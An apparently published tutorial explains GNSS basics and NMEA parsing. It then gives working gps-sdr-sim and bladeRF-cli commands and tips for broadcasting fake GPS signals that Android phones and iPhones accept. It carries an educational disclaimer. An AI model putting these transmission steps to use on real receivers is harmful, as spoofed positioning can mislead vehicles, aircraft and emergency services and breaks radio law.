GPS spoofing: How to become a satellite

Written by

Each of us uses satellite navigation to get anywhere outside our backyard. But what if GPS, as of a sudden, stops working and cannot be used to determine your location anymore? This article presents an efficient technique enabling you to fool GPS.

warning

Never perform actions described below near airports and other objects that are heavily dependent on georeferencing! On-the-air operations require special permission and must comply with safety requirements. All information provided in this article is for educational purposes only. Neither the author, nor the Editorial Board can be held liable for potential consequences arising from the use of this information.

Theory

GNSS

Global Navigation Satellite System (GNSS) enables its users to determine their location. Technically, GNSS is a network that includes various satellite and ground systems. The most popular positioning system are the American GPS and the Russian GLONASS. You might also know Galileo (EU) and BeiDou (China), but they are much less widespread.

Three main groups of devices are used to determine your location: space-based, user-based, and ground-based (control segment).

As you might have guessed, space devices are satellites. Each system has its own satellites with different orbits. Satellites broadcast data at different frequencies and at different time intervals to avoid interference with each other.

Ground systems synchronize time, validate information on satellites, adjust orbits, and monitor the key functions of satellites (to ensure that they operate normally).

The user segment is represented by client devices that determine their location using GNSS. The simplest example is a standard GNSS receiver in your phone.

To determine its location, the end device must receive information from a satellite and process it somehow. The procedure involving the processing of signals and location identification is called triangulation (there are other techniques as well, but they are beyond the scope of this article).

Frequencies

Depending on the specific satellite system, GNSS transmits data using different frequencies. Let’s briefly examine the three main bands, their frequencies, and the purpose of these frequencies.

GNSS operates on three main bands: L1, L2, and L5. They were introduced sequentially as enhanced versions of the navigation system. Together, they are simply called the L band (or the decimeter-wave band). This band describes frequencies from 1 to 2 GHz (or from 1000 to 2000 MHz). Several navigation systems can operate on one band at once: for instance, GPS, GLONASS, and Galileo operate simultaneously on the L1 band.

L1 is the oldest band used by almost all satellite navigation systems. Since it’s old, almost all receivers can pick it up. Its only disadvantage is that the signal in this frequency range poorly bends around obstacles (e.g. walls of buildings, foliage, thick clouds, etc.) and hardly passes through them.

L2 was introduced to replace L1. Its signal bends around obstacles better, and you can pick it up even in hard-to-reach places. The band is considered new and is normally used in combination with L1.

L5 is the latest technology used primarily in aviation, although civilian receivers can sometimes use it as well.

More about bands and frequencies

GPS operates in all three bands; while alternative navigation systems haven’t occupied all available frequencies yet. L1 accommodates GPS (1575.42 MHz), GLONASS (1602 MHz), and Galileo (1575.42 MHz). In L2, GPS operates at 1227.6 MHz; while GLONASS, at 1246 MHz. L5 is used by Galileo (1207.14 MHz and 1176.45 MHz) and GPS (a single frequency of 1176.45 MHz).

Civilian and military services use different frequencies, and this article addresses only civilian ones. In addition, military signals are much more accurate and encrypted to prevent their use by unfriendly forces.

The same band can be used for different purposes depending on the navigation system.

Frequencies and bands used by GNSS
Frequencies and bands used by GNSS

ARNS frequencies are normally used in aviation, while ground-based receivers use RNSS frequencies.

Triangulation and trilateration

The satellite cannot transmit your location to you since every user has a unique location, and your device doesn’t transmit anything to the outside world. In other words, your coordinates must be computed directly on the receiver side, and a single signal isn’t sufficient for this. Accordingly, you have to pick up several (at least three or four) signals at once. These signals transmit to you their own coordinates and times. Based on this data, you can determine your location using simple formulas. Two main methods used to determine your coordinates are triangulation and trilateration.

Triangulation makes it possible to identify the location of a point based on three reference points. In this case, satellites act as reference points, but the problem is that spacecraft fly at an altitude of some 20,000 km, and, to use this method, you must know the distance to each of the satellites very accurately. To facilitate the positioning procedure, trilateration is used.

Trilateration determines the coordinates of a point using a system of spheres.

Trilateration: the fourth measurement precisely determines your location. The intersection of four spheres gives a single point
Trilateration: the fourth measurement precisely determines your location. The intersection of four spheres gives a single point

Distances to the satellites can be determined based on the signal transmission time from the satellite to the receiver multiplied by the light speed – but you need to know the exact time when the signal was sent.

A simple way to determine your coordinates

In reality, if you have a microcontroller, you can find out your coordinates without the need to solve linear algebra equations. This task can be successfully performed by cheap GNSS receivers that will provide your coordinates and the source used to determine them (i.e. satellite system) in the NMEA format.

GPS receiver
GPS receiver

NMEA is a standardized format used to transmit GNSS data. If you decide to assemble a device intended to work with GNSS, you have to use the NMEA format (i.e. no need to review documentation for each format used by various satellite systems).

To get the required data, you can connect to the receiver via USB or UART. Since I only have a UART with arranged soldered connections, I created a bridge on the basis of an Auduino board and went outside to collect some data.

If you use a ready-made GNSS receiver, then its output will look approximately as shown below:

$GPRMC,102668.00,A,2565.63860,N,05723.41802,E,44.621,122.82,301122,,,A*54
$GPVTG,122.82,T,,M,44.621,N,82.638,K,A*34
$GPGGA,102669.00,2995.64530,N,05723.40668,E,1,04,2.16,19.7,M,-26.4,M,,*48
$GPGSA,A,3,07,09,04,14,,,,,,,,,6.09,2.16,5.70*05
$GPGSV,2,1,05,04,43,108,34,07,53,338,35,09,73,051,37,14,33,217,28*7B
$GPGSV,2,2,05,16,04,038,*44
$GPGLL,2585.64930,N,05123.40668,E,102608.00,A,A*6E
$GPRMC,107129.00,A,2565.63860,N,05723.41802,E,47.084,123.07,301122,,,A*5C

These strings are messages in the NMEA format (i.e. satellite data already processed by the GNSS receiver). They don’t look very clear, but it’s quite easy to extract your coordinates from them.

Let’s examine the first message as an example:

$GPRMC,102668.00,A,2565.63860,N,05723.41802,E,44.621,122.82,301122,,,A*54

As you can see, each message begins with a dollar sign followed by five letters and a comma. This header indicates the data type contained in the message. The first two letters (in this case GP) indicate the GNSS system the information was received from. GP means GPS. You may encounter other satellite systems as well; below is the list of possible variants:

  • GP – GPS only;
  • GL – GLONASS only;
  • BD – BeiDou only;
  • GA – Galileo only; and 
  • GN – multiple systems are used simultaneously.

The next three letters indicate the data type (e.g. RMC: Recommended Minimum Specific GNSS Data). Your coordinates are contained in the RMC, GLL and GGA messages.

You can skip all fields except coordinates (descriptions of the skipped fields can be found in the NMEA documentation). 2565.63860,N is the latitude in the DDMM.MMMMM format where N means the northern hemisphere; while 05723.41802,E is the longitude in the format DDDMM.MMMMM, where E means the eastern hemisphere. In other words, the coordinates of your test point are 25 degrees 65.63860 minutes north latitude and 57 degrees 23.41802 minutes east longitude.

To view this point on online maps, you have to convert GPS coordinates to decimal degrees. For this purpose, you can use the online calculator.

TTFF

TTFF (time to first fix) is a measure of the time required for a GPS navigation device to collect data and determine its location. This parameter is of key importance for spoofing.

If your device has no data about satellites, this process can take up to twelve minutes, but usually only two to three minutes are required.

Practice

Plenty of GPS spoofing guides are available on the Internet, but all of them have a common feature: they aren’t applicable in 2023 (at least, in my case). Many modern phones can determine location not only based on satellites: they use Wi-Fi and Bluetooth for this purpose. Cell towers can also be used for positioning… Therefore, let’s try to spoof GPS data on an Android smartphone first and see what problems can arise in the course of such spoofing.

Equipment

The following equipment is used in my experiment:

  • bladeRF 2.0 Micro Xa4 as a transmitter;
  • HackRF One as a receiver and transmitter;
  • RFSPACE antenna; and 
  • Mi A2.
BladeRF
BladeRF
HackRF one
HackRF one
RFSPACE
RFSPACE
Mi A2
Mi A2

GPS-SDR-SIM

GPS-SDR-SIM makes it possible to generate data for any location or trajectory. To do this, you have to download an ephemeris table (satellite coordinates at a specific time) and specify the location.

www

GPS-SDR-SIM is one of the most popular and best-known tools for GPS spoofing. At the time of publication, its repository contained more than 2000 stars, and the project gets updates on a regular basis.

First of all, download the source code and build the program:

git clone https://github.com/Nuand/gps-sdr-sim
cd gps-sdr-sim
gcc gpssim.c -lm -O3 -o gps-sdr-sim

Then connect bladeRF and generate a file:

./gps-sdr-sim -e hour3060.22n -l 21.296965,-157.815687,100 -b 16 -o gpssim.bin -t $(date -u +%Y/%m/%d,+%X)

www

Satellite data can be downloaded from the NASA website. Data are provided on an hourly basis, which makes it possible to avoid the time-related error (almost all guides that I have found contain it).

The -t parameter is responsible for time that will be transmitted by your rogue ‘satellites’. It is of utmost importance since new phones don’t work with outdated data – even those that are only two-three hours behind in time.

Using static location mode.
Start time = 2022/11/02,07:21:33 (2234:285693)
Duration = 300.0 [sec]
02 180.0 25.6 22759545.5 6.5
06 54.7 20.9 23631267.8 5.3
11 90.0 38.3 22154769.5 4.3
12 355.4 46.2 21368898.6 4.0
13 163.0 4.3 25471171.1 10.3
15 186.1 19.4 24115672.2 7.7
19 38.7 3.5 25179568.2 5.6
20 119.8 1.4 25729982.2 7.7
24 102.8 78.9 20375053.9 3.1
25 312.8 32.9 22268020.3 5.5
29 231.8 37.9 22208289.9 5.3
32 306.8 14.9 24242464.5 8.5
Time into run = 300.0
Done!
Process time = 46.2 [sec]

Don’t worry if you get an Invalid Start Time error: it means that NASA hasn’t updated data on its website yet. Just wait a bit, download a new file, and repeat the generation.

When the file is ready, download a GPS monitoring application called GPS Test to your test device, run it, and enable transmission from your computer:

lll@lll ~/s/gps-sdr-sim (master)> bladeRF-cli -i
bladeRF> set frequency 1575.42M

For best results, it’s not recommended to set both RX and TX to the
same frequency. Instead, consider offsetting them by at least 1 MHz
and mixing digitally.

For the above reason, ‘set frequency ‘ is deprecated and
scheduled for removal in future bladeRF-cli versions.

Please use ‘set frequency rx’ and ‘set frequency tx’ to configure
channels individually.

RX1 Frequency: 1575419998 Hz (Range: [70000000, 6000000000])
RX2 Frequency: 1575419998 Hz (Range: [70000000, 6000000000])
TX1 Frequency: 1575419998 Hz (Range: [47000000, 6000000000])
TX2 Frequency: 1575419998 Hz (Range: [47000000, 6000000000])

bladeRF> set samplerate 2.6M

Setting RX1 sample rate – req: 2600000 0/1Hz, actual: 2600000 0/1Hz
Setting RX2 sample rate – req: 2600000 0/1Hz, actual: 2600000 0/1Hz
Setting TX1 sample rate – req: 2600000 0/1Hz, actual: 2600000 0/1Hz
Setting TX2 sample rate – req: 2600000 0/1Hz, actual: 2600000 0/1Hz

bladeRF> set bandwidth 2.5M

RX1 Bandwidth: 2500000 Hz (Range: [200000, 56000000])
RX2 Bandwidth: 2500000 Hz (Range: [200000, 56000000])
TX1 Bandwidth: 2500000 Hz (Range: [200000, 56000000])
TX2 Bandwidth: 2500000 Hz (Range: [200000, 56000000])

bladeRF> set gain tx 56

Setting TX1 overall gain to 56 dB
Gain TX1 overall: 56 dB (Range: [-23.75, 66])
dsa: -90 dB (Range: [-89.75, 0])

bladeRF> tx config file=/home/lll/soft/gps-sdr-sim/gpssim.bin format=bin
bladeRF> tx start
bladeRF> tx wait

Satellites with good signal levels will be displayed on the smartphone screen.

Still, you can see that the system status is No Fix (i.e. the system cannot determine its location). The green bars represent ‘satellites’ spoofed by bladeRF. In other words, the system operates and sees satellites, but the phone refuses to determine its location. Sometimes it takes a while for the device to receive the data and process it (TTFF); so, to maintain the experimental integrity, I rebooted the phone and turned data transmission on for five minutes. Still no result: the phone continued ignoring my rogue satellites.

Since my file with coordinates has also expired, I turned the clock on my phone a little back and changed the location: now it’s 1 km from my real position. Why only 1 km? Based on my tests, if you change the coordinates significantly (i.e. suddenly ‘jump’ over a long distance), the phone may reject such data as implausible; so, you have to change your fake coordinates gradually:

lll@lll ~/s/gps-sdr-sim (master)> ./gps-sdr-sim -e brdc2022_3060.22n -d 1000 -l 51.296965,124.815687,100 -b 16 -o gpssim.bin -t 2022/11/02,08:00:00

Using static location mode.
Start time = 2022/11/02,08:00:00 (2234:288000)
Duration = 1000.0 [sec]
02 174.0 43.6 21497540.2 3.6
05 140.4 4.3 25351515.3 6.8
06 41.5 11.5 24590008.1 4.2
11 66.9 36.4 22296887.8 3.3
12 20.6 45.8 21422074.0 3.1
15 176.8 7.9 25304780.7 8.2
18 198.6 4.3 25335825.2 10.3
20 104.6 6.7 25172344.8 4.8
22 314.6 4.6 25557500.2 8.9
24 146.6 63.7 20898055.3 2.7
25 332.2 40.0 21745559.7 3.7
29 253.1 49.9 21398805.8 3.4
32 290.3 19.4 23734754.8 6.5
Time into run = 1000.0
Done!
Process time = 142.4 [sec]

I run data transmission again and check the result.

Now the status is displayed as 3D Fix: location determined! The time received from the ‘satellites’ is 12:00, which is a little behind the phone clock, but still within normal limits. Depending on the device, the lifetime of satellite data can range from thirty minutes to four hours. The real time on the smartphone (displayed in the upper left corner) is 12:34, and an error of thirty-four minutes is considered normal in situations where other satellites are unavailable.

iPhone

A similar situation can be observed on an iPhone; the location can be spoofed without any problems. Let’s jump to the Persian Gulf!

Voila! Note that this is a new phone that had never seen a GPS signal before; so, it picked up the fake location pretty quickly. Wi-Fi and the cellular network failed to explain the phone that its coordinates are fake.

Critical points to pay attention to

Below are a few simple rules to be kept in mind when you spoof GPS:

  1. Check the validity of data taken from the NASA website on a regular basis since they are updated frequently;
  2. Monitor the time your ‘satellites’ transmit to the device: some phones don’t work with too outdated data;
  3. Give your device time to ‘save’ the fake satellites;
  4. Don’ change your location to a distant one at once: such implausible values will be ignored, and then it will take longer to process normal signals;
  5. Pay attention to Wi-Fi and cellular communications: sometimes they can be used to determine location (although on new devices this won’t help);
  6. Use an appropriate antenna; and 
  7. If you use HackRF, make sure you have an external quartz resonator; otherwise time will ‘float’.

Additional observations and assumptions:

  • Different satellites operate in different parts of the Earth; so, to increase the chance of success, spoof only satellites that are most often used in your current location;
  • Some maps use third-party sources to determine locations. Apple Maps and Google Maps data sometimes differ. Google positioning is more accurate;
  • If you clear old GPS data, you can fool almost any device; and 
  • To increase your chances, set the time (in data taken from the NASA website) as close to reality as possible; if this doesn’t help, give the device some time (up to 10-15 minutes) to process the new data. On most new devices, this step will certainly be required.

Conclusions

Even though device manufacturers take various steps to prevent spoofing, it’s still possible under certain conditions. And the more autonomous devices appear in our world, the more severe this problem is. It’s one thing to prank a friend by ‘sending’ his phone to Senegal, and it’s totally another thing to make a self-driving Tesla take a wrong turn…

Beware!


Leave a Reply

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>